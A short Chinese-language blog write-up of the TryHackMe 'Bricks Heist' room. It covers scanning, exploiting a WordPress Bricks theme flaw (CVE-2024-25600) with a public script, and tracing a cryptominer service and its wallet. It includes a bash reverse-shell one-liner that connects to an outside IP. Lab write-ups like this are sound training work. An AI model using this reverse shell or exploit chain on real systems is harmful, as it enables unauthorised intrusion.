TryHackMe-TryHack3M:Bricks Heist
TryHackMe-TryHack3M: Bricks Heist
flag01
What is the content of the hidden .txt file in the web folder?
访问ip会跳转bricks.thm(提前编辑好/etc/hosts)
1 | nmap -sCV -T4 --min-rate=1000 -O -oN scan bricks.thm |
发现存在wordpress
wpscan插件扫一扫
使用了bricks主题
尝试搜索相关漏洞https://github.com/Chocapikk/CVE-2024-25600
脚本利用
反弹shell
1 | bash -c 'exec bash -i &>/dev/tcp/10.21.148.202/9999 <&1' |
拿到flag1
flag02
What is the name of the suspicious process?
1 | systemctl list-units --type=service --state=running |
1 | systemctl cat ubuntu.service |
flag03
What is the service name affiliated with the suspicious process?
如上
flag04
What is the log file name of the miner instance?
1 | cd /lib/NetworkManager/ |
flag05
What is the wallet address of the miner instance?
1 | 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d |
发现有规律
1 | bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 晴川's Blog🌈!
